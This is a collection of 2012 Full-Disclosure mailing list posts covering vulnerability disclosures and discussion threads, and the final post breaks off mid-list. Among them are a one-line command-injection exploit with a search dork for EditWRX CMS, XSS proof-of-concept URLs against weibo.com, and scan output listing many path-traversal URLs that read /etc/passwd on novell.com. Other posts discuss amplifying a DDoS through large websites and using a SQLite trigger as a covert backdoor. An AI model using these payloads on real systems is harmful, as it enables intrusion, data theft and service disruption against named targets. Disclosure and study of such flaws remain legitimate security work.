[Full-disclosure] [TEHTRI-Security] 0days at HITB Amsterdam 2012
Dear contacts, During the next Hack In The Box event in Amsterdam (22nd 23rd May 2012), TEHTRI-Security will come again, and propose an updated training called *Hunting Web Attackers* with offensive cyber weapons shared with our students. For example, during the final live hacking exercise, we will show how to strike-back against a team of attackers, thanks to multiple kind of 0days (hacking: web applications + client-side + network, etc). Beyond our cyber-weapons against kits used by cyber-criminals (0days against Zeus, Crimepack, etc), our students will also get more hacking tricks that can make the difference during asymmetric cyber conflicts. Examples ? We will share 0days that can help at bypassing a firewall, in order to pown a remote evil LAN used by cyber-criminals (live demo shared with students in our lab: bypassing an updated Cisco product). To get our hacking tricks, do not hesitate to register soon, while seats are still available. 100% of seats were taken last time. _HITB Training link_ http://conference.hitb.org/hitbsecconf2012ams/tech-training-1-hunting-web-attackers/ Moreover, if you're interesting about *mobile hacking*, we wrote some lines related to vulnerabilities about Gmail App on iPhone/iPad. Feel free to read our thoughts/findings on our blog: _TEHTRIS Blog link_ http://blog.tehtri-security.com/2012/01/gmail-app-security-issues-on.html We essentially saw that the famous GX cookie was written in clear-text on an iOS device, while Apple suggests to use Keychains capabilities to store sensitive information (see Apple devel doc). According to us, App vendors should do offensive pentests against mobile applications. This year, we found plenty of vulnerabilities against iOS app or MDM infrastructure (hacking thousands of devices).. And we are not the only company feeling this big trouble in the Force, for IT Security and Mobile stuff. Best regards, Laurent Estieux (CTO) Laurent Oudot (CEO) TEHTRI-Security - This is not a Game http://www.tehtri-security.com/ @tehtris ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
secure_CC_POS Thanks Derek On 13/02/2012, at 22:17, Alex Buie ab...@kwdservices.com wrote: Just morbidly curious, what did you use for the SSID? On Feb 12, 2012 5:31 PM, Derek de...@madrock.net wrote: They should at least consider providing an option to disable the static pin only or disable it after an hour if the future is activated by the user. Seems to be something that could be included in a future firmware update. For a vendor to provide another mechanism for a user to get remotely hacked (within wireless TX/RX range) and not address it in a reasonable amount of time, exposes the less technical user, who is was intended to help in the first place. It would be interesting to see if this feature went through a technical security risk assessment and if so, how the static pin was rationalised for public release. I setup an isolated vulnerable device and had attack traffic within 2 days of it being activated. I did make the SSID very attractive, but the war drivers are certainly getting out of the house again. Thanks Derek On 13/02/2012, at 1:47, Rob Fuller jd.mu...@gmail.com wrote: I've tested a 6 models of Linksys, all of them appear to disable WPS completely as soon as a single wireless setting is set. I assume this would be the reason Cisco/Linksys aren't putting much stock in 'fixing' it further. If anyone has any experience to contradict this or have a modification to current tools to circumvent what I've perceived as disabled, I, as I'm sure Craig, would be very interested. -- Rob Fuller | Mubix Certified Checkbox Unchecker Room362.com | Hak5.org On Sat, Feb 11, 2012 at 4:23 PM, farthva...@hush.ai wrote: _ Use Tomato-USB OS on them. _ Besides you void warranty... list of DD-WRT Supported routers: E1000supported E1000 v2 supported E1000 v2.1 supported E1200 v1 ??? E1200 v2 ??? E1500??? E1550??? E2000supported E2100L supported E2500not supported E3000supported E3200supported E4200 v1 not supported yet E4200 v2 not supported M10 M20 M20 v2 RE1000 WAG120N not supported WAG160N not supported WAG160N v2 not supported WAG310G not supported WAG320N not supported WAG54G2 not supported WAP610N not supported WRT110 not supported WRT120N not supported WRT160N v1 supported WRT160N v2 not supported WRT160N v3 supported WRT160NL supported WRT310N v1 supported WRT310N v2 not supported yet WRT320N supported WRT400N supported WRT54G2 v1 supported WRT54G2 v1.3 supported WRT54G2 v1.5 not supported WRT54GS2 v1 supported WRT610N v1 supported WRT610N v2 supported X2000not supported X2000 v2 not supported X3000not supported. _ Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either. _ What about removing WuPS entirely? WuPS is a total failure because: 1. Even if everything is fine 8 digits long is very weak because once you got the pin after 7 month - 2 years for example, you are completely pwned. 2. Pin number is fixed you can't change it to a longer number or maybe a string like omgponnies 3. Setting up a WPA2 password manually it's a piece of cake (even with keypad only cell phones), if some people are lazy, you don't have to weakening the security of a strong protocol. Farth Vader ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Just morbidly curious, what did you use for the SSID? On Feb 12, 2012 5:31 PM, Derek de...@madrock.net wrote: They should at least consider providing an option to disable the static pin only or disable it after an hour if the future is activated by the user. Seems to be something that could be included in a future firmware update. For a vendor to provide another mechanism for a user to get remotely hacked (within wireless TX/RX range) and not address it in a reasonable amount of time, exposes the less technical user, who is was intended to help in the first place. It would be interesting to see if this feature went through a technical security risk assessment and if so, how the static pin was rationalised for public release. I setup an isolated vulnerable device and had attack traffic within 2 days of it being activated. I did make the SSID very attractive, but the war drivers are certainly getting out of the house again. Thanks Derek On 13/02/2012, at 1:47, Rob Fuller jd.mu...@gmail.com wrote: I've tested a 6 models of Linksys, all of them appear to disable WPS completely as soon as a single wireless setting is set. I assume this would be the reason Cisco/Linksys aren't putting much stock in 'fixing' it further. If anyone has any experience to contradict this or have a modification to current tools to circumvent what I've perceived as disabled, I, as I'm sure Craig, would be very interested. -- Rob Fuller | Mubix Certified Checkbox Unchecker Room362.com | Hak5.org On Sat, Feb 11, 2012 at 4:23 PM, farthva...@hush.ai wrote: _ Use Tomato-USB OS on them. _ Besides you void warranty... list of DD-WRT Supported routers: E1000supported E1000 v2 supported E1000 v2.1 supported E1200 v1 ??? E1200 v2 ??? E1500??? E1550??? E2000supported E2100L supported E2500not supported E3000supported E3200supported E4200 v1 not supported yet E4200 v2 not supported M10 M20 M20 v2 RE1000 WAG120N not supported WAG160N not supported WAG160N v2 not supported WAG310G not supported WAG320N not supported WAG54G2 not supported WAP610N not supported WRT110 not supported WRT120N not supported WRT160N v1 supported WRT160N v2 not supported WRT160N v3 supported WRT160NL supported WRT310N v1 supported WRT310N v2 not supported yet WRT320N supported WRT400N supported WRT54G2 v1 supported WRT54G2 v1.3 supported WRT54G2 v1.5 not supported WRT54GS2 v1 supported WRT610N v1 supported WRT610N v2 supported X2000not supported X2000 v2 not supported X3000not supported. _ Fixing? Heh. Aside from rate limiting WPS, there isn't much of a fix, and you can't turn it off either. _ What about removing WuPS entirely? WuPS is a total failure because: 1. Even if everything is fine 8 digits long is very weak because once you got the pin after 7 month - 2 years for example, you are completely pwned. 2. Pin number is fixed you can't change it to a longer number or maybe a string like omgponnies 3. Setting up a WPA2 password manually it's a piece of cake (even with keypad only cell phones), if some people are lazy, you don't have to weakening the security of a strong protocol. Farth Vader ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
__ __ __ __ __ ..| |--.|__|.-.-.--.--.|_ | |__|__| | | __|| || || _ | _ | | | _| |_|__|__|_ | |||__|__||__|| __| __|___ ||__|__|__| || _|__|__|__|__|_|_ VULN_ EditWRX CMS Remote Code Execution + Admin Bypass Zero Day NFO__ EditWRX is vulnerable to remote code execution through mishandling of open() in the downloader, which can read in piped commands. Despite the downloader being an administrative component, a login is not required to call the function, and therefore no access is required to exploit this vulnerability. ZDAY_ Google: inurl:editwrx/wrx.cgi RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a| Found by: chippy1337 GREETZ___ Robert Cavanaugh Ryan Cleary Jasper Lingers Carlos1337 (dos cero dia!) MASTER HACKER FLOOD HACKER DR TIGER WANG HACKER DDOS KING Sabu, Havij Professional D0xbin ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Arbitrary DDoS PoC
With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] XSS vulnerability in WEIBO.COM
Information
-
Name : XSS Vulnerability in WEIBO.COM
Vendor Homepage : http://corp.sina.com.cn/eng/sina_index_eng.htm
Vulnerability Type : Cross-Site Scripting
Severity : High
Researcher : Yuping Li at ADLab of Beijing Leadsec Technology Co., Ltd
Description
-
WEIBO.COM is the largest twitter-like website in China, which claimed to
have more than 200 million users in 2011. It was operated by SINA
Corporation (USA, Nasdaq: Sina), which is an online media company for China
and Chinese Community around the world. Weibo is one of SINA's four major
business lines.
Details
-
ADLab (Leadsec) has discovered vulnerability in WEIBO.COM, which can be
exploited to perform cross-site scripting attacks, potentially affect large
number of users.
Example PoC urls are as follows :
http://weibo.com/mobile/cellphone?ky=iphone
scriptalert('test')/scriptrefer=help
Actually, the refer parameter can be removed :
http://weibo.com/mobile/cellphone?ky=
/titlescriptalert('test')/script
Successful exploitation of this vulnerability requires that victim is
logged-in to the vulnerable website.
Solution
-
Fix the code.
Advisory Timeline
06/01/2012 - First indirectly contact: Sent the vulnerability details
09/01/2011 - Vulnerability partially fixed, still vulnerable
12/01/2012 - Second directly contact: Sent the vulnerability details
13/02/2012 - Vulnerability Released
Credits
-
Attack and Defense Lab, Beijing Leadsec Technology Co., Ltd (
http://www.leadsec.com.cn/en/index.html)
References
-
Vendor Url : http://corp.sina.com.cn/eng/sina_index_eng.htm
Disclaimer
-
The information provided in this advisory is provided as it is without any
warranty. Leadsec disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Leadsec
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business
profits or special damages, even if Leadsec or its suppliers have been
advised of the possibility of such damages. Some
countries do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation
may not apply. Any modified copy or reproduction, including partially
usages, of this file requires authorization from Leadsec.
Permission to electronically redistribute this alert in its unmodified form
is granted. All other rights, including the use of
other media, are reserved by Leadsec or its suppliers.
Copyright © 2012 | Beijing
Leadsec Technology Co., Ltd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Skype v. 5.x.x - information disclosure
Title: == Skype v. 5.x.x - information disclosure Date: = 2012-02-13 Introduction: = Skype is a proprietary voice-over-Internet Protocol service and software application. Abstract: = We have discovered improper chat logs handling, which cause in logs accessibility even if user had enabled no history option in Keep history for settings or even destroy it manually with Clear history button. Report-Timeline: 2012-02-13: Public Disclosure Status: Published Exploitation-Technique: === Local Severity: = Low Details: As mentioned in the Skype FAQ (https://support.skype.com/en-gb/faq/FA140/Managing-your-privacy-settings-Windows): You can choose how long to keep your conversation history for, or delete it altogether. 1. To change your history settings, in Skype from the menu bar click Skype Privacy. 2. Below Keep history for, click on the drop-down list and select the amount of time you would like your history to be saved for. Choose from forever, 3 months, 1 month, 2 weeks or no history at all. 3. To delete your conversation history, click Clear history. This removes your entire history, including instant messages, calls, voicemails, text messages, sent and received files. If you delete your conversation history, you cannot recover it. This sounds safely, but in fact Skype stored all incoming and outgoing chat messages into local sqlite3 DB (file main.db, table Messages), in plain text. Even if Keep history for-no history option in Settings-Security is enabled, Skype write all your data into Messages table, but executes delete * from Messages after program exit. This command will destroy messages at logical level in DB, but in fact, in physical level all messages data stay alive (blocks in the DB file only marks as destroyed), and simply can be recovered even with text editor (as mentioned above, it is stored in plain text). Proof of Concept: = In Windows XP, go to C:\Documents and Settings\%user name%\Application Data\Skype\%Skype user name% and open file main.db with text editor. All the ducks inside. Credits: Anonymous ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Trustwave and Mozilla
Hi Jeffrey, On 02/12/2012 11:54 AM, Jeffrey Walton wrote: For what its worth, pinning the certificate can usually remediate these sorts of MitM attacks, but Mozilla subverted it: http://ssl.entrust.net/blog/?p=615. Please take a look at our security roadmap ( https://wiki.mozilla.org/Security/Roadmap ). You will see that CA pinning is a P1 Feature which means it is actively being worked on. In fact our update service does already some sort of pinning (for securely retrieving updates), it's just that failures are not reported right now. It's possible that this sort of pinning could be extended to other services and also alert the user (and/or us, if that is possible somehow). Cheers, Chris smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Arbitrary DDoS PoC
Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Skype v. 5.x.x - information disclosure
Good find. I think it should also be possible to disable the delete * command with triggers, as a nice way to backdoor the database (almost non intrusive compared with installing rogue plugins, and the user isn't likely to ever find out). On Mon, Feb 13, 2012 at 11:25 AM, Osama Bin Error oer...@gmail.com wrote: Title: == Skype v. 5.x.x - information disclosure Date: = 2012-02-13 Introduction: = Skype is a proprietary voice-over-Internet Protocol service and software application. Abstract: = We have discovered improper chat logs handling, which cause in logs accessibility even if user had enabled no history option in Keep history for settings or even destroy it manually with Clear history button. Report-Timeline: 2012-02-13: Public Disclosure Status: Published Exploitation-Technique: === Local Severity: = Low Details: As mentioned in the Skype FAQ (https://support.skype.com/en-gb/faq/FA140/Managing-your-privacy-settings-Windows): You can choose how long to keep your conversation history for, or delete it altogether. 1. To change your history settings, in Skype from the menu bar click Skype Privacy. 2. Below Keep history for, click on the drop-down list and select the amount of time you would like your history to be saved for. Choose from forever, 3 months, 1 month, 2 weeks or no history at all. 3. To delete your conversation history, click Clear history. This removes your entire history, including instant messages, calls, voicemails, text messages, sent and received files. If you delete your conversation history, you cannot recover it. This sounds safely, but in fact Skype stored all incoming and outgoing chat messages into local sqlite3 DB (file main.db, table Messages), in plain text. Even if Keep history for-no history option in Settings-Security is enabled, Skype write all your data into Messages table, but executes delete * from Messages after program exit. This command will destroy messages at logical level in DB, but in fact, in physical level all messages data stay alive (blocks in the DB file only marks as destroyed), and simply can be recovered even with text editor (as mentioned above, it is stored in plain text). Proof of Concept: = In Windows XP, go to C:\Documents and Settings\%user name%\Application Data\Skype\%Skype user name% and open file main.db with text editor. All the ducks inside. Credits: Anonymous ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- “There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people.” ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Arbitrary DDoS PoC
I have to admit that I've only read the posts here, haven't actually followed the link, but in response to Gage: It entirely depends on how it's being done, specifically: what services/applications are being targeted and in what way. If he's proxying through big servers such as those owned by Facebook, Google, Wikipedia, etc: then it definitely does make a difference. You're assuming that his network speed would be the bottleneck, but to make that assumption, you first have to assume that he's actually waiting around for response data. Maybe it's too early to convey this in an understandable way, I don't know. An example scenario that would be effective though: imagine that you run a web server, also imagine that there's a resource (CPU/bandwidth) intensive script/page on that server. For the sake of discussion, let's assume that my home internet speed is 1/10 of your server. We can also probably assume that your server's network speed is 1/10 of Google's. If I can force Google's server to request that page, that automatically puts me at an advantage (especially if I close the connection before Google can send the response back to me). Even if you're correct about his particular script, the logic behind your response is flawed. In the above example, one could use multithreading to cycle requests to your server through Google, Facebook, Wikipedia, whoever. As soon as the request has been sent, the connection could be terminated. If that for some reason wouldn't work, the script could wait until one byte is received (e.g. the 2 in 200 OK) and close the connection then. At that point, the bandwidth/resources would have already been used. The bottom line is that you could easily use the above concepts (and likely what the OP has designed) to overpower a server/service while using very little resources of your own. It's all circumstantial anyway though. My overall point, specifics aside, is that being able to use Google or Facebook's resources against a target is definitely beneficial and has all kinds of advantages. On Mon, Feb 13, 2012 at 7:17 AM, Gage Bystrom themadichi...@gmail.comwrote: Uhh...looks pretty standard boss. You aren't going to DoS a halfway decent server with that using a single box. Sending your request through multiple proxies does not magically increase the resource usage of the target, its still your output power vs their input pipe. Sure it gives a slight boost in anonymity and obfuscation but does not actually increase effectiveness. It would even decrease effectiveness because you bear the burden of having to send to a proxy, giving them ample time to recover from a given request. Even if you look at it as a tactic to bypass blacklisting, you still aren't going to overwhelm the server. That means you need more pawns to do your bidding. This creates a bit of a problem however as then all your slaves are running through a limited selection of proxies, reducing the amount of threats the server needs to blacklist. The circumvention is quite obvious, which is to not utilize proxies for the pawnsand rely on shear numbers and/or superior resource exhaustion methods On Feb 13, 2012 4:37 AM, Lucas Fernando Amorim lf.amo...@yahoo.com.br wrote: With the recent wave of DDoS, a concern that was not taken is the model where the zombies were not compromised by a Trojan. In the standard modeling of DDoS attack, the machines are purchased, usually in a VPS, or are obtained through Trojans, thus forming a botnet. But the arbitrary shape doesn't need acquire a collection of computers. Programs, servers and protocols are used to arbitrarily make requests on the target. P2P programs are especially vulnerable, DNS, internet proxies, and many sites that make requests of user like Facebook or W3C, also are. Precisely I made a proof-of-concept script of 60 lines hitting most of HTTP servers on the Internet, even if they have protections likely mod_security, mod_evasive. This can be found on this link [1] at GitHub. The solution of the problem depends only on the reformulation of protocols and limitations on the number of concurrent requests and totals by proxies and programs for a given site, when exceeded returning a cached copy of the last request. [1] https://github.com/lfamorim/barrelroll Cheers, Lucas Fernando Amorim http://twitter.com/lfamorim ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2012:018 ] mozilla-thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2012:018 http://www.mandriva.com/security/ ___ Package : mozilla-thunderbird Date: February 13, 2012 Affected: 2011. ___ Problem Description: Use-after-free vulnerability in Mozilla Firefox 10.x before 10.0.1, Thunderbird 10.x before 10.0.1, and SeaMonkey 2.7 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger failure of an nsXBLDocumentInfo::ReadPrototypeBindings function call, related to the cycle collector#039;s access to a hash table containing a stale XBL binding (CVE-2012-0452). ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0452 advisories/template/2012/MDVSA-2012-017_firefox ___ Updated Packages: Mandriva Linux 2011: 78e3a0ab8ef460141ed9653d1c99caab 2011/i586/mozilla-thunderbird-10.0.1-0.1-mdv2011.0.i586.rpm 3bf367979724feadd466a3c18aa15207 2011/i586/mozilla-thunderbird-ar-10.0.1-0.1-mdv2011.0.noarch.rpm b28ed347bc7ad1929615ca3d97e7133b 2011/i586/mozilla-thunderbird-be-10.0.1-0.1-mdv2011.0.noarch.rpm 3416382fde19e52a08c627fd73dc812c 2011/i586/mozilla-thunderbird-bg-10.0.1-0.1-mdv2011.0.noarch.rpm 624ca18cbd6c80877e1ff56bc93431f9 2011/i586/mozilla-thunderbird-bn_BD-10.0.1-0.1-mdv2011.0.noarch.rpm b92b572f3dc606b6ae1708678556c09e 2011/i586/mozilla-thunderbird-br-10.0.1-0.1-mdv2011.0.noarch.rpm fc6e99bec25e35584eb16076bc617ccf 2011/i586/mozilla-thunderbird-ca-10.0.1-0.1-mdv2011.0.noarch.rpm 7ff9746c313c75f7aef7da9f7fa14fa1 2011/i586/mozilla-thunderbird-cs-10.0.1-0.1-mdv2011.0.noarch.rpm 9da51fa3440c2428a06cf9c255480893 2011/i586/mozilla-thunderbird-da-10.0.1-0.1-mdv2011.0.noarch.rpm 624b645a9cbd3fe26e1fda02e17ac936 2011/i586/mozilla-thunderbird-de-10.0.1-0.1-mdv2011.0.noarch.rpm f054af1b25ffb8bd47dcbd62c02a645f 2011/i586/mozilla-thunderbird-el-10.0.1-0.1-mdv2011.0.noarch.rpm 9e273671b5bcb4a68ef5d1726e25c2f1 2011/i586/mozilla-thunderbird-en_GB-10.0.1-0.1-mdv2011.0.noarch.rpm 25b39fc906f3fe241d480fa873f1bbf6 2011/i586/mozilla-thunderbird-enigmail-10.0.1-0.1-mdv2011.0.i586.rpm f0b62612790bc52fc3b6015f4f1caaa1 2011/i586/mozilla-thunderbird-enigmail-ar-10.0.1-0.1-mdv2011.0.noarch.rpm fc3e9deb4c09113076ff3d3f0ad73973 2011/i586/mozilla-thunderbird-enigmail-ca-10.0.1-0.1-mdv2011.0.noarch.rpm 32be26aa8440b2e912aef2c08d1de512 2011/i586/mozilla-thunderbird-enigmail-cs-10.0.1-0.1-mdv2011.0.noarch.rpm bbe5c947018d86870ea499a4f7a1d090 2011/i586/mozilla-thunderbird-enigmail-de-10.0.1-0.1-mdv2011.0.noarch.rpm 368e899845a9605e55475fb220a900d6 2011/i586/mozilla-thunderbird-enigmail-el-10.0.1-0.1-mdv2011.0.noarch.rpm c9a29ab47e8e9036a225235e794eb5e9 2011/i586/mozilla-thunderbird-enigmail-es-10.0.1-0.1-mdv2011.0.noarch.rpm 1c1877801e695e38a5e0299a1244eab3 2011/i586/mozilla-thunderbird-enigmail-fi-10.0.1-0.1-mdv2011.0.noarch.rpm e9113c13ebe831eceb35f90f99851c43 2011/i586/mozilla-thunderbird-enigmail-fr-10.0.1-0.1-mdv2011.0.noarch.rpm 964bff7a85266fd534e2ef74205810c7 2011/i586/mozilla-thunderbird-enigmail-it-10.0.1-0.1-mdv2011.0.noarch.rpm 746de0ccc1319fe82add5569ea83ae53 2011/i586/mozilla-thunderbird-enigmail-ja-10.0.1-0.1-mdv2011.0.noarch.rpm 88d73083d99c04631d64676628445b1c 2011/i586/mozilla-thunderbird-enigmail-ko-10.0.1-0.1-mdv2011.0.noarch.rpm 11cf850d811cf7600e9373ce2a37f7cf 2011/i586/mozilla-thunderbird-enigmail-nb-10.0.1-0.1-mdv2011.0.noarch.rpm 155fae0e4ada0a82cdf0f71abef09812 2011/i586/mozilla-thunderbird-enigmail-nl-10.0.1-0.1-mdv2011.0.noarch.rpm 44c7adaa37779a9fd45cf924dec447ae 2011/i586/mozilla-thunderbird-enigmail-pl-10.0.1-0.1-mdv2011.0.noarch.rpm ce92167411abe0c7eb33c9a2a3fe886c 2011/i586/mozilla-thunderbird-enigmail-pt-10.0.1-0.1-mdv2011.0.noarch.rpm 061fbb58c0070501f74f6d78a403f747 2011/i586/mozilla-thunderbird-enigmail-pt_BR-10.0.1-0.1-mdv2011.0.noarch.rpm cf42b34338099ea1bf35c9e156e45b9e 2011/i586/mozilla-thunderbird-enigmail-ru-10.0.1-0.1-mdv2011.0.noarch.rpm b73d1546820a1ff8fb6e53768dc99336 2011/i586/mozilla-thunderbird-enigmail-sl-10.0.1-0.1-mdv2011.0.noarch.rpm 071f94d5f3dcb65a8214051d1e1fe2af 2011/i586/mozilla-thunderbird-enigmail-sv-10.0.1-0.1-mdv2011.0.noarch.rpm 6880266cd4a907d181aaca19d13d9071 2011/i586/mozilla-thunderbird-enigmail-tr-10.0.1-0.1-mdv2011.0.noarch.rpm 33b0505d1084e446a8ce6bd926e71987 2011/i586/mozilla-thunderbird-enigmail-vi-10.0.1-0.1-mdv2011.0.noarch.rpm aa238528440676ff5917f2b26c513a81 2011/i586/mozilla-thunderbird-enigmail-zh_CN-10.0.1-0.1-mdv2011.0.noarch.rpm
Re: [Full-disclosure] Linksys Routers still Vulnerable to Wps vulnerability.
Steve while he's often derided goes into this very well. Many cisco's only stop advertising wps when it is off but wps actually still exists...which means they are still easily hackable. Have you directly confirmed a WPS exchange can occur even on devices that aren't advertising support? That would indeed be a quick and dirty way to turn the feature off. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Vulnerability in Novell website.
Hi, We have escalated this within Novell and the CRS servlet got removed last week on the day of the report. Ciao, Marcus On Mon, Feb 13, 2012 at 04:36:44PM +0100, Team wrote: Hello :-) I sent email stating the problem for the company, waited a few days and got no response, so I'm making the vulnerability public: Scan date: 2-2-2012 13:33:54 === | Domain: http://www.novell.com/ [1] | Server: Apache | IP: 130.57.5.25 === ... | LFI: | [+] Vul[1] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00 [2] | [+] Vul[2] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.jpg [3] | [+] Vul[3] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.html [4] | [+] Vul[4] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.css [5] | [+] Vul[5] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.php [6] | [+] Vul[6] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.inc [7] | [+] Vul[7] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.txt [8] | [+] Vul[8] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=../../../../../../../../../../etc/passwd%00.png [9] | [+] Vul[9] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=//../../../../../../../../etc/passwd%00 [10] | [+] Vul[10] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=//../../../../../../../../etc/passwd%00en [11] | [+] Vul[11] [LFI] http://www.novell.com/servlet/CRS?Action=Start+Searchvideo=truesource=/../..//../..//../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd%00 [12] | [+] Vul[12] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00full_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [13] | [+] Vul[13] [LFI] http://www.novell.com/servlet/CRS?reference_name=-op=%25Action=Start+SearchSubmit=Start+Searchsource=../../../../../../../../../../etc/passwd%00.jpgfull_text_limit=showcase_verbiage+%2C+press_releaseMaxRows=0; [14] | [+] Vul[14] [LFI] 